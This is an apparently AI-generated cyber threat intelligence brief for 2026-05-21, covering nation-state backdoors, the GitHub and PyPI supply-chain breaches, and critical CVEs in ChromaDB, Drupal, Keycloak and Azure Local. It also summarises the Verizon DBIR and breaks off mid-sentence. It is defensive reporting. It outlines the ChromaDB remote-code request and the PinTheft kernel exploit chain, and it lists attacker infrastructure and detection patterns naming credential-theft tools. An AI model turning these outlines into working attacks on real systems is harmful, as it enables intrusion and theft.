# CTI Daily Brief — 2026-05-21 > **AI-generated content — no human review.** This brief was produced autonomously by an LLM (Claude Opus 4.7, model ID `claude-opus-4-7`) with parallel research and verification by sub-agents (Claude Sonnet 4.6) executing the prompt at `prompts/daily-cti-brief.md` as a Claude Code routine on Anthropic-managed cloud infrastructure. **Nothing here is reviewed or edited by a human before publication.** All facts are linked inline to public sources the agent fetched in this run. Verify any operationally critical claim against the linked primary source before acting. **Generated by:** Claude Opus 4.7 (`claude-opus-4-7`) · **Sub-agents:** S1: Claude Sonnet 4.6 · S2: Claude Sonnet 4.6 · S3: Claude Sonnet 4.6 · S4: Claude Sonnet 4.6 · verify: Claude Opus 4.7, Claude Sonnet 4.6 · **Classification:** TLP:CLEAR · **Language:** English · **Prompt:** v2.59 · **Recency window:** 36 h (gap to prior brief: 24 h) ## 0. TL;DR - **Drupal patches "highly critical" pre-auth SQL injection (CVE-2026-9082)** on PostgreSQL-backed installs of Drupal 8.9–11.3; the Security Team warned that "exploits *might* be developed within hours or days" of advisory release. EU/CH government portals and university CMSes are the primary exposed surface ([Drupal Security Team, 2026-05-20](https://www.drupal.org/sa-core-2026-004); [NCSC-CH, 2026-05-19](https://security-hub.ncsc.admin.ch/#/posts/12584)). - **Webworm (China-aligned) targets Belgian, Italian, Serbian and Polish government organisations** with two new custom backdoors — EchoCreep (Discord C2) and GraphWorm (Microsoft Graph / OneDrive C2). ESET also documents Spanish and Italian governmental documents exfiltrated to a compromised AWS S3 bucket ([ESET Research, 2026-05-20](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/)). - **TeamPCP breaches GitHub itself** — ~3,800 internal repositories exfiltrated via a poisoned VS Code extension installed on a GitHub employee device; in parallel, the Mini Shai-Hulud worm compromised the official Microsoft `durabletask` PyPI package and propagates across AWS via Systems Manager `SendCommand` and across Kubernetes via `kubectl exec` ([Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/); [Wiz, 2026-05-20](https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack)). - **Microsoft ships CVE-2026-42822 — CVSS 10.0 unauthenticated network EoP in Azure Local Disconnected Operations (ALDO)** with MSRC exploitability assessment "Exploitation More Likely"; only manually-operated air-gapped Azure Local stacks need action (cloud-managed Azure already protected) ([Microsoft MSRC, 2026-05-18](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822)). - **Verizon 2026 DBIR (today's deep dive):** vulnerability exploitation overtakes credentials as the leading breach initial-access vector for the first time in the report's 19-year history — 31 % per Verizon's press release ([Verizon, 2026-05-19](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html)) vs 13 % credentials per Help Net Security's reading of the full DBIR ([Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/)); only 26 % of CISA KEV entries fully remediated (down from 38 %); supply-chain breaches +60 % YoY. ## 1. Active Threats, Trending Actors, Notable Incidents & Disclosures ### Webworm (China-aligned) shifts to EU government targets — EchoCreep (Discord C2) and GraphWorm (Microsoft Graph / OneDrive C2) backdoors documented by ESET, with Belgian, Italian, Serbian, Polish and Spanish governmental victims ESET Research published a technical analysis on 2026-05-20 of Webworm — also tracked as FishMonger / Aquatic Panda / SixLittleMonkeys / Space Pirates — documenting a 2025 campaign pivot to European governmental organisations in Belgium, Italy, Serbia and Poland, plus a South African university; the group has abandoned its prior primary backdoors (Trochilus RAT, McRat / 9002 RAT) in favour of two new custom implants — EchoCreep (which ESET describes as written in Go) and GraphWorm ([ESET WeLiveSecurity, 2026-05-20](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/)). **EchoCreep** uses Discord as a bidirectional C2 channel, encoding commands with base64 + AES-CBC-128; it creates per-victim Discord channels named after the victim IP (or IP+hostname), supports file upload/download and `cmd.exe` command execution, and ESET recovered 433 decrypted Discord messages dating back to 2024-03-21 from four unique victim channels (`T1102.002` Web Service: Bidirectional Communication, `T1059.003` Windows Command Shell). **GraphWorm** is more capable: an implant (implementation language not stated in the ESET write-up) that authenticates against the Microsoft Graph API and uses per-victim OneDrive directories for C2, with `/createUploadSession` for large-file exfiltration and AES-256-CBC + base64 encoding on uploaded data (`T1102.002`, `T1071.001` Application Layer Protocol — Web Protocols); it persists at logon and spawns `cmd.exe` sessions under the implant's process context. The custom proxy toolkit added in 2025 includes **WormFrp** (a modified `frp` that pulls its config from a compromised AWS S3 bucket `wamanharipethe.s3.ap-south-1.amazonaws.com`), **ChainWorm** (multi-hop chaining), **SmuxProxy**, and **WormSocket** (`socket.io`-based proxy); a **SharpSecretsdump** Impacket-look-alike credential dumper was uploaded to the same S3 bucket in October 2025 (`T1003.001` OS Credential Dumping: LSASS Memory) ([ESET, 2026-05-20](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/); [The Hacker News, 2026-05-20](https://thehackernews.com/2026/05/webworm-deploys-echocreep-and-graphworm.html)). Files exfiltrated from victims and staged in the S3 bucket included virtual-machine snapshots from an Italian governmental entity and an mRemoteNG connection-configuration file plus a Microsoft Visio infrastructure diagram from a Spanish governmental entity — both documents that materially aid follow-on intrusion. Initial-access tradecraft documented against Serbian targets used CVE-2017-7692 (SquirrelMail post-auth RCE), implying credential theft preceded webmail exploitation. **Why it matters to us:** the cloud-API C2 design (Discord, Microsoft Graph) blends with legitimate enterprise traffic and defeats domain / URL block-lists. Detection concept — alert on Sysmon EID 3 outbound HTTPS to `discord.com/api/*` or `graph.microsoft.com` from process trees whose parent is not the expected first-party application (`Discord.exe`, `Teams.exe`, `OneDrive.exe`, Office); correlate Graph API non-interactive sign-ins in Entra ID for app registrations with no enterprise approval path; flag `cmd.exe` spawned by long-running services with no interactive user context. Hardening — Conditional Access for the Microsoft Graph application restricting non-managed device sign-ins; block `socket.io` and Discord WebSocket outbound at the SWG for server workloads that have no business reason; force first-party-only WebSocket egress on government-segment workstations. — *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/) · Additional source: [The Hacker News](https://thehackernews.com/2026/05/webworm-deploys-echocreep-and-graphworm.html) · Tags: nation-state, espionage, identity, cloud, china-nexus · Region: europe · Sector: public-sector, education* ### SonicWall Gen6 SSL-VPN incomplete-patching (CVE-2024-12802) — Akira-linked actors brute-force MFA via UPN/SAM account-name split, February–March 2026 intrusions Threat actors whose TTPs are consistent with Akira ransomware activity successfully bypassed MFA on SonicWall Gen6 SSL-VPN appliances running officially-patched firmware between February and March 2026; SonicWall and incident-response vendors confirm the root cause is that the firmware update for CVE-2024-12802 (CVSS 9.1, `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`) does not by itself enforce MFA on both User Principal Name (`user@domain`) and SAM-account-name (`DOMAIN\user`) login formats — six additional manual LDAP-reconfiguration steps from SonicWall KB `kA1VN0000000RBd0AM` are required ([Cybersecurity Dive, 2026-05-20](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/); [BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/security/hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching/)). Attackers brute-forced credentials against the UPN login path — which accepts authentication without triggering MFA challenges when the LDAP reconfiguration is incomplete — at speed and without producing the standard authentication alerts; per BleepingComputer's reporting, intrusion responders observed sessions of 30 to 60 minutes during which attackers logged in, performed network reconnaissance, tested credential reuse on internal systems and logged out. Gen6 SSL-VPN reached end-of-life on 2026-04-16 and receives no further security updates; Gen7 and Gen8 are remediated by firmware update alone. **Why it matters to us:** the technique is a textbook example of why CVSS / vendor-advised patch status is insufficient operational signal — the appliance shows patched-firmware version, MFA appears enabled in the admin UI, and authentications succeed against an alternative account-name format that bypasses the policy enforcement entirely. Detection concept — SonicWall Gen6 SSL-VPN syslog filter for successful SSL-VPN authentications where the `login` field is UPN-format rather than SAM-format, especially from source IPs with high authentication-attempt volume; correlate with short-duration recon-and-credential-reuse sessions consistent with the 30-to-60-minute pattern BleepingComputer documents. Hardening — complete every step in SonicWall KB `kA1VN0000000RBd0AM`; given Gen6 EoL, migrate to Gen7/Gen8 on a defined cut-over timeline. — *Source: [Cybersecurity Dive](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching/) · Tags: ransomware, vulnerabilities, actively-exploited, identity, auth-bypass · Region: europe, global · Sector: public-sector, finance, technology · CVE: CVE-2024-12802 · CVSS: 9.1 · Vector: zero-click · Auth: pre-auth · Status: exploited, patch-available, mitigation-only* ### B1ack's Stash carding marketplace publicly releases 4.6M card records — SOCRadar attributes collection to e-skimming and phishing; not confirmed by issuing banks The dark-web carding marketplace B1ack's Stash — operational since at least 2023, with prior free-release waves of 1M cards in April 2024 and 4M in February 2025 — announced the free release of approximately 4.6 million stolen credit and debit card records on 2026-05-18 as a punitive action against vendors that cross-listed cards on competing shops ([SOCRadar, 2026-05-18](https://socradar.io/blog/b1acks-stash-4-6-million-stolen-credit-cards-free/); [Security Affairs, 2026-05-20](https://securityaffairs.com/192415/cyber-crime/carding-site-b1acks-stash-dumps-4-6-million-stolen-cards-for-free.html)). Each record carries the full primary account number, expiration date, CVV2, cardholder name, billing address, email, phone number and source IP — sufficient detail for card-not-present (CNP) fraud. SOCRadar's analysis estimates ~4.3 million records are net-new after de-duplication and expired-card filtering; geographic distribution is approximately 70 % US-issued, with Canada, UK, France, Malaysia, Hong Kong, Singapore and Thailand as secondary sources. SOCRadar attributes the collection methodology to e-skimming and phishing based on capture completeness. This is a dark-web marketplace claim — B1ack's Stash listed the dump for free, but no individual issuing bank has confirmed that specific cards originated from their systems. **Defender takeaway:** Swiss and European card-fraud teams should query their compromise feeds (FS-ISAC, card-network compromise files) for matching BIN ranges and review e-skimming exposure on legacy WooCommerce / Magento storefronts in the customer-facing estate; the consistent collection-method finding across multiple B1ack's Stash waves points at front-end JavaScript skimmer infections as the upstream root cause that still goes undetected in many low-volume merchant configurations. — *Source: [SOCRadar](https://socradar.io/blog/b1acks-stash-4-6-million-stolen-credit-cards-free/) · Additional source: [Security Affairs](https://securityaffairs.com/192415/cyber-crime/carding-site-b1acks-stash-dumps-4-6-million-stolen-cards-for-free.html) · Tags: cryptocrime, data-breach, phishing, organized-crime · Region: us, europe, apac · Sector: finance, retail* ## 2. Trending Vulnerabilities ### CVE-2026-42822 — Microsoft Azure Local Disconnected Operations (ALDO): CVSS 10.0 unauthenticated network elevation-of-privilege, "Exploitation More Likely" Microsoft assigned CVE-2026-42822 (CVSS 3.1 = 10.0, CWE-287 Improper Authentication, vector `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`) to an authentication-bypass flaw in Azure Local Disconnected Operations (ALDO) — Microsoft's solution for running Azure services in air-gapped or partially-disconnected infrastructure environments — that allows an unauthorised network attacker to elevate privileges over a network with no credentials and no prior foothold ([Microsoft MSRC, 2026-05-18](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822)). MSRC rates "Exploitation More Likely"; no in-the-wild exploitation observed and no public PoC at advisory release. Cloud-managed Azure customers using Microsoft-operated Resource Manager environments are already protected — only manually-operated air-gapped Azure Local stacks need action. Remediation requires upgrading ALDO to version 2604 or later via the standard ALDO update channel. **Defender takeaway:** EU public-sector operators running Azure Local for data-sovereignty / federal data-residency compliance (a common pattern in Bundesverwaltung and German Bundesbehörden environments) should treat this as a Patch-Tuesday-class emergency on disconnected infrastructure where update cadence is typically slower than cloud-managed Azure. Restrict the ALDO management plane to admin-only OOB subnets until v2604 is installed. — *Source: [Microsoft MSRC](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822) · Tags: vulnerabilities, cloud, auth-bypass, priv-esc · Region: global · CVE: CVE-2026-42822 · CVSS: 10.0 · Vector: zero-click · Auth: pre-auth · Status: patch-available* ### CVE-2026-45829 — ChromaDB Python FastAPI server: pre-auth RCE via embedding-function model loading before auth check (CVSS 4.0 = 10.0; still unpatched in v1.5.9) HiddenLayer / Hadrian researchers disclosed CVE-2026-45829, a CVSS 4.0 = 10.0 pre-authentication RCE in ChromaDB's Python FastAPI server (affected from v1.0.0) ([Hadrian Security, 2026-05-19](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are); [BleepingComputer, 2026-05-19](https://www.bleepingcomputer.com/news/security/max-severity-flaw-in-chromadb-for-ai-apps-allows-server-hijacking/)). The vulnerable endpoint is `POST /api/v2/tenants/{tenant}/databases/{db}/collections`: when the request body sets `trust_remote_code: true` with an attacker-controlled HuggingFace model identifier (or a local path), the server fetches and executes the attacker-supplied Python code *before* the auth check fires, then politely returns `403 Forbidden` after the code has run. The flaw exists only in the Python FastAPI server (`chromadb[server]` pip package) — the default Rust server (`chroma run`) does not traverse this code path. Per [BleepingComputer's reporting of Shodan queries](https://www.bleepingcomputer.com/news/security/max-severity-flaw-in-chromadb-for-ai-apps-allows-server-hijacking/), approximately 73 % of internet-exposed ChromaDB instances are running a vulnerable version of the software. **As of disclosure, ChromaDB v1.5.9 (latest) is unpatched.** Mitigations: disable the Python FastAPI server and migrate to the Rust server; alternatively, block network-level access to the ChromaDB API (it should never be internet-exposed in the first place); if internal, set `trust_remote_code: false` server-wide via config. Detection concept — unexpected outbound network connections from ChromaDB Python server processes; child processes spawned by `uvicorn` / `gunicorn` workers with non-default lineage; access logs showing `POST /api/v2/.../collections` bodies referencing HuggingFace repository slugs with attacker-controlled patterns. `T1190` Exploit Public-Facing Application; the impact maps to `T1059.006` Python execution under the server context. — *Source: [Hadrian Security](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/max-severity-flaw-in-chromadb-for-ai-apps-allows-server-hijacking/) · Tags: vulnerabilities, rce, pre-auth, no-patch, poc-public, ai-abuse · Region: global · Sector: technology, education · CVE: CVE-2026-45829 · CVSS: 10.0 · Vector: zero-click · Auth: pre-auth · Status: poc-public, no-patch* ### Keycloak 26.6.2 — 16 CVEs including OIDC session fixation (CVE-2026-7507), WebAuthn execute-actions token replay (CVE-2026-37982), introspection audience bypass (CVE-2026-37979) and cross-realm IDOR in Authorization Services (CVE-2026-4630) The Keycloak project shipped 26.6.2 on 2026-05-19, fixing 16 CVEs across identity, authentication and authorisation subsystems; BSI's CERT-Bund issued advisory WID-SEC-2026-1612 on 2026-05-20 classifying the batch as HIGH risk ([Keycloak Project, 2026-05-19](https://www.keycloak.org/2026/05/keycloak-2662-released); [BSI CERT-Bund, 2026-05-20](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1612)). The operationally highest-priority CVEs for public-sector defenders: **CVE-2026-7507** — session fixation in the OIDC login flow where a crafted `state` parameter before user authentication completes enables account takeover (`T1078` Valid Accounts, `T1556` Modify Authentication Process); **CVE-2026-37982** — execute-actions token replay allowing unauthorised WebAuthn / FIDO2 credential enrollment on a victim account after one user interaction (`T1098.005` Account Manipulation: Device Registration); **CVE-2026-37979** — the OIDC token introspection endpoint `/auth/realms/{realm}/protocol/openid-connect/token/introspect` does not enforce audience restrictions, leaking claims from lightweight access tokens scoped to one client when presented to any introspection-enabled endpoint; **CVE-2026-4630** — cross-resource-server IDOR in the Authorization Services Protection API allowing an authenticated attacker with a token from realm A to read or modify resource permissions in realm B on the same Keycloak instance; **CVE-2026-37978** — cross-role PII leakage via the admin `/auth/admin/realms/{realm}/clients/{client}/evaluate-scopes` endpoint bypassing user-view permissions; **CVE-2026-6856** — acceptable-AAGUID policy bypass in WebAuthn packed self-attestation, allowing enrollment of hardware tokens outside the configured policy list. Fix: upgrade to 26.6.2; Red Hat build of Keycloak (RH-SSO / RHBK) 26.2.x is similarly affected via separate RHSA advisories. **Defender takeaway:** Keycloak is the de-facto standard IAM for EU public-sector and Swiss cantonal / federal identity federation projects, with multiple member-state digital-identity frameworks and national eHealth platforms built on top. Detection concept — admin audit-log entries showing token-introspection responses for mismatched audiences; cross-realm access attempts surfaced as `RESOURCE_TYPE: authorization_resource` in admin event logs; WebAuthn enrollment events with an AAGUID outside the configured policy list. — *Source: [Keycloak Project](https://www.keycloak.org/2026/05/keycloak-2662-released) · Additional source: [BSI CERT-Bund WID-SEC-2026-1612](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1612) · Tags: vulnerabilities, identity, auth-bypass, patch-available, eu-nexus · Region: europe, dach · Sector: public-sector, healthcare, education · CVE: CVE-2026-7507, CVE-2026-37982, CVE-2026-37979, CVE-2026-4630, CVE-2026-37978, CVE-2026-6856 · CVSS: not yet assigned (BSI HIGH classification) · Vector: zero-click · Auth: pre-auth · Status: patch-available* #### CVE Summary Table | CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source | |---|---|---|---|---|---|---|---| | CVE-2026-9082 | Drupal core (PostgreSQL backend) | 20/25 Drupal-scale | not yet scored | No | No (vendor warned of within-hours weaponisation) | 10.4.10 / 10.5.10 / 10.6.9 / 11.1.10 / 11.2.12 / 11.3.10 (2026-05-20) | [Drupal](https://www.drupal.org/sa-core-2026-004) | | CVE-2026-42822 | Microsoft Azure Local Disconnected Operations (ALDO) | 10.0 | not yet scored | No | No (MSRC: "Exploitation More Likely") | ALDO 2604+ (2026-05-18) | [MSRC](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-42822) | | CVE-2026-45829 | ChromaDB Python FastAPI server | 10.0 (CVSS 4.0) | not yet scored | No | No (public PoC by HiddenLayer) | None — v1.5.9 unpatched at disclosure | [Hadrian](https://hadrian.io/blog/cve-2026-45829----chromadb-python-server-hands-you-rce-before-it-asks-who-you-are) | | CVE-2026-7507 | Keycloak (OIDC login session fixation) | not yet assigned (BSI HIGH) | not yet scored | No | No | 26.6.2 (2026-05-19) | [Keycloak](https://www.keycloak.org/2026/05/keycloak-2662-released) | | CVE-2024-12802 | SonicWall Gen6 SSL-VPN | 9.1 (CVSS 3.1) | not retrieved | No | Yes — Akira-linked, Feb–Mar 2026 | Firmware update insufficient without 6-step LDAP reconfig; Gen6 EoL 2026-04-16 | [Cybersecurity Dive](https://www.cybersecuritydive.com/news/patch-bypass-hackers-exploit-flaw-sonicwall/820600/) | ## 3. Research & Investigative Reporting ### PinTheft — Linux kernel local-privilege-escalation primitive (RDS zerocopy double-free + io_uring fixed-buffer page-cache overwrite), PoC public, Arch Linux default-loaded Aaron Esau (V12 Security) disclosed PinTheft on 2026-05-19 via the `oss-security` mailing list — a Linux kernel local privilege escalation that chains an RDS (Reliable Datagram Sockets) zerocopy double-free with `io_uring` fixed-buffer reference manipulation to overwrite the page cache of a SUID-root binary and gain root ([oss-security / V12 Security, 2026-05-19](https://www.openwall.com/lists/oss-security/2026/05/19/6); [BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/linux/exploit-released-for-new-pintheft-arch-linux-root-escalation-flaw/)). The bug lives in `rds_message_zcopy_from_user()` in the RDS send path: a partial page fault mid-scatter causes the error path to drop already-pinned pages while leaving the scatterlist bookkeeping live, so cleanup drops the pages a second time. The exploit registers an anonymous memory page as an `io_uring` fixed buffer (`FOLL_PIN` bias of 1024 references), drains all references via 1024 deliberately-failing RDS sends, then reuses the stale `io_uring` page pointer to overwrite the page cache of a SUID-root binary and redirect execution to attacker shellcode. Prerequisites: RDS kernel module loaded, `io_uring` enabled, a readable SUID-root binary, x86_64. **The RDS module is default-loaded only on Arch Linux** — not on Ubuntu, Fedora, Debian, RHEL or SUSE — narrowing the primary defender population to Arch CI/CD runners, developer workstations and AUR-based servers, plus any environment that explicitly `modprobe`'d `rds`. Upstream kernel patch landed before disclosure; **no CVE assigned at disclosure**. Technique class: `T1068` Exploitation for Privilege Escalation. Defender detection — auditd syscall events for `rds_sendmsg` / `io_uring_*` from unexpected binaries; Sysmon Linux EID 1 with process lineage showing a non-root process spawning a root shell without `sudo`/`su`. Hardening: `modprobe.d` blacklist `rds` if not in use; `sysctl kernel.io_uring_disabled=2` for untrusted workloads; apply upstream kernel patch when distributed via the distro's normal update channel. — *Source: [oss-security mailing list / V12 Security](https://www.openwall.com/lists/oss-security/2026/05/19/6) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/linux/exploit-released-for-new-pintheft-arch-linux-root-escalation-flaw/) · Tags: vulnerabilities, lpe, poc-public, patch-available · Region: global · Sector: technology* ## 4. Updates to Prior Coverage ### UPDATE: Drupal SA-CORE-2026-004 / CVE-2026-9082 ships — "highly critical" pre-auth SQL injection in core database API, PostgreSQL-only > **UPDATE (originally covered 2026-05-20):** yesterday's brief carried Drupal's PSA pre-warning that a "highly critical" core advisory was scheduled for 2026-05-20; today the [SA-CORE-2026-004 advisory](https://www.drupal.org/sa-core-2026-004) landed with **CVE-2026-9082** assigned — an anonymous SQL-injection in Drupal core's database abstraction API (CWE-89) rated **20/25 on Drupal's risk scale (Highly Critical)** that affects only PostgreSQL-backed installations. Specially-crafted HTTP requests slip past sanitisation in the core DB-API layer and inject arbitrary SQL with no authentication; successful exploitation leads to information disclosure, privilege escalation and — in some database configurations — RCE. The Drupal Security Team explicitly stated that "exploits might be developed within hours or days" of advisory release ([Drupal PSA, 2026-05-18](https://www.drupal.org/psa-2026-05-18)). > > Affected versions: 8.9.0 through 10.4.10, 10.5.x < 10.5.10, 10.6.x < 10.6.9, 11.0.0 through 11.1.10, 11.2.x < 11.2.12, 11.3.x < 11.3.10. Patched: 10.4.10 / 10.5.10 / 10.6.9 / 11.1.10 / 11.2.12 / 11.3.10 (released 2026-05-20). MySQL / MariaDB / SQLite installations are not affected by this CVE. Drupal 7 is unaffected; sites on EOL Drupal 8/9 majors must apply manual patch files. [Drupal Steward WAF](https://www.drupal.org/steward) subscribers receive vendor-provided rules at advisory release per the service description; non-subscriber sites must apply the core update. NCSC-CH carried the advisory in its Security Hub ([NCSC-CH, 2026-05-19](https://security-hub.ncsc.admin.ch/#/posts/12584); [SecurityWeek, 2026-05-19](https://www.securityweek.com/drupal-to-patch-highly-critical-vulnerability-at-risk-of-quick-exploitation/); [CSO Online, 2026-05-20](https://www.csoonline.com/article/4175329/drupal-admins-rushing-to-patch-maximum-severity-sql-injection-vulnerability.html)). > > **Defender takeaway:** detection — PostgreSQL slow-query logs and `pg_stat_activity` for abnormal SQL statements from the Drupal application user; web-server access logs for unusual URL-encoded SQL meta-characters in POST/GET parameters proxied through the Drupal DB-API layer; WAF rules targeting PostgreSQL-specific injection patterns (`UNION`, `CAST`, `pg_sleep`). Hardening — patch immediately on PostgreSQL backends; if patch deployment is blocked by change-control, temporarily front the site with the Drupal Steward WAF or apply a temporary WAF rule covering known SQL-injection vectors at the DB-API layer. > > — *Source: [Drupal Security Team SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) · Additional source: [NCSC-CH Security Hub](https://security-hub.ncsc.admin.ch/#/posts/12584) · Additional source: [SecurityWeek](https://www.securityweek.com/drupal-to-patch-highly-critical-vulnerability-at-risk-of-quick-exploitation/) · Additional source: [CSO Online](https://www.csoonline.com/article/4175329/drupal-admins-rushing-to-patch-maximum-severity-sql-injection-vulnerability.html) · Tags: vulnerabilities, pre-auth, patch-available, eu-nexus · Region: global, europe, switzerland · Sector: public-sector, education, media · CVE: CVE-2026-9082 · CVSS: 20/25 Drupal-scale (highly critical) · Vector: zero-click · Auth: pre-auth · Status: patch-available* ### UPDATE: TeamPCP / Mini Shai-Hulud campaign — GitHub itself breached (~3,800 internal repos via poisoned VS Code extension), Microsoft `durabletask` PyPI worm propagates via AWS SSM and `kubectl exec`, Grafana confirms missed-token-rotation root cause > **UPDATE (originally covered 2026-05-13 deep dive; multiple subsequent updates):** three new TeamPCP / Mini Shai-Hulud developments landed in this window — GitHub itself, the official Microsoft `durabletask` PyPI package, and the Grafana Labs root-cause disclosure. > > **GitHub.** GitHub confirmed on 2026-05-20 that TeamPCP (also tracked as UNC6780) accessed approximately 3,800 internal GitHub repositories after a single GitHub employee installed a poisoned Visual Studio Code extension on their device ([The Hacker News, 2026-05-20](https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html); [The Record, 2026-05-20](https://therecord.media/github-confirms-teampcp-hack-customers-unaffected); [Infosecurity Magazine, 2026-05-20](https://www.infosecurity-magazine.com/news/github-confirms-breach-vs-code/); [Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/)). GitHub detected and contained the breach on 2026-05-19, isolated the affected endpoint and rotated high-impact secrets; the company states there is no evidence customer data stored outside the internal repositories was accessed. **GitHub has not publicly named the malicious VS Code extension or its publisher at this writing.** TeamPCP listed the stolen repositories — including GitHub Actions internals, agentic-workflow code, Copilot internal projects, CodeQL tools, Codespaces, Dependabot, and a Rails controller managing organisations and PRs — for sale at $50,000, with LAPSUS$ announcing a joint sale and a $95,000 asking price. > > **durabletask (PyPI).** Wiz Security reported on 2026-05-20 that the TeamPCP / Mini Shai-Hulud worm compromised the official Microsoft `durabletask` PyPI package via versions 1.4.1, 1.4.2 and 1.4.3 ([Wiz, 2026-05-20](https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack)). The payload is a dropper that fetches `rope.pyz` from `check.git-service[.]com`; per Wiz the second stage is a full credential stealer targeting AWS, Azure, GCP, Kubernetes and Vault credentials, 1Password and Bitwarden vaults, filesystem credentials and shell history. Propagation per Wiz: on Kubernetes hosts the worm uses `kubectl exec`; on AWS EC2 instances it propagates via AWS Systems Manager `SendCommand` against up to 5 targets per host (`T1078.004` Cloud Accounts, `T1570` Lateral Tool Transfer). > > **Grafana Labs.** Grafana Labs published the post-mortem of its own TeamPCP breach on 2026-05-19, confirming the root cause was a single GitHub Actions workflow token that slipped through the rotation process after the TanStack npm supply-chain attack ([Grafana Labs, 2026-05-19](https://grafana.com/blog/grafana-labs-security-update-latest-on-tanstack-npm-supply-chain-ransomware-incident/); [BleepingComputer, 2026-05-20](https://www.bleepingcomputer.com/news/security/grafana-breach-caused-by-missed-token-rotation-after-tanstack-attack/)). Per Grafana's own post-mortem the TanStack compromise was detected on 2026-05-11 (note: BleepingComputer cites 2026-05-01 for the malicious-package consumption event — surfaced as a contradiction in § 7); Grafana rotated the bulk of its GitHub workflow tokens, but the residual unrotated token gave TeamPCP access to clone private source-code repositories (exact count not disclosed in Grafana's post-mortem). Grafana refused the extortion demand on 2026-05-16. The exfiltration scope is confirmed limited to Grafana Labs GitHub repositories (public source code, private source code and internal repos); customer production data was not affected. > > **Defender takeaway:** audit VS Code extension marketplace policies and consider a managed extensions allowlist via Group Policy / MDM (the VS Code marketplace does not enforce mandatory code-signing). Hunt — Sysmon EID 1 for `code --install-extension` invocations on developer endpoints; process trees where `Code.exe` or `code-server` spawn credential-access tools (`git-credential-manager`, `aws configure`, keychain access). Audit GitHub Actions OIDC token rotation completeness after any supply-chain incident; verify GitHub secret-scanning + push-protection are enabled on every org. CI/CD pipeline logs should be searched for `durabletask` imports in the 1.4.1–1.4.3 version range; treat any host that imported a malicious version as fully compromised. Review AWS SSM `SendCommand` audit logs for invocations that do not correspond to authorised maintenance windows. > > — *Source: [The Hacker News](https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html) · Additional source: [Wiz Security](https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack) · Additional source: [Grafana Labs](https://grafana.com/blog/grafana-labs-security-update-latest-on-tanstack-npm-supply-chain-ransomware-incident/) · Additional source: [The Record](https://therecord.media/github-confirms-teampcp-hack-customers-unaffected) · Additional source: [BleepingComputer](https://www.bleepingcomputer.com/news/security/grafana-breach-caused-by-missed-token-rotation-after-tanstack-attack/) · Additional source: [Help Net Security](https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/) · Tags: supply-chain, organized-crime, cloud, identity, data-breach · Region: global · Sector: technology, public-sector* ## 5. Deep Dive — Verizon 2026 DBIR: vulnerability exploitation overtakes credentials as primary breach vector for the first time in 19 years Verizon published the 2026 Data Breach Investigations Report on 2026-05-19 covering, per the full DBIR PDF, tens of thousands of security incidents and over ten thousand confirmed breaches collected over the standard DBIR window (autumn of the prior year through autumn of the report year) ([Verizon official press release via GlobeNewswire, 2026-05-19](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html); [Help Net Security analysis, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/); [Verizon DBIR landing page](https://www.verizon.com/business/resources/reports/dbir/) — the specific dataset incident / breach counts cited by some secondary coverage were not separately confirmed in the press-release coverage and should be read against the full DBIR PDF at `verizon.com/business/resources/T1f0/reports/2026-dbir-data-breach-investigations-report.pdf`). This is the publication event that the 2026-W21 weekly summary flagged as imminent — the dedicated PD-9 treatment lands here. The report is structurally significant for European public-sector SOCs because it provides industry-spanning patching-cadence and supply-chain benchmarks that map cleanly onto NIS2 risk-management obligations. **Headline shift: exploitation overtakes credentials.** For the first time in the DBIR's 19-year history, vulnerability exploitation (`T1190` Exploit Public-Facing Application) is the leading initial-access vector at 31 % of breaches — Verizon's own press-release language ([GlobeNewswire](https://www.globenewswire.com/news-release/2026/05/19/3297614/0/en/Vulnerability-Exploitation-Top-Breach-Entry-Point-2026-Industry-Wide-DBIR-Finds.html)). Per Help Net Security's reading of the full DBIR, compromised credentials (`T1078` Valid Accounts; `T1110` Brute Force) dropped to 13 % ([Help Net Security, 2026-05-20](https://www.helpnetsecurity.com/2026/05/20/verizon-2026-dbir-findings/)). This is a sustained inversion, not a single-year 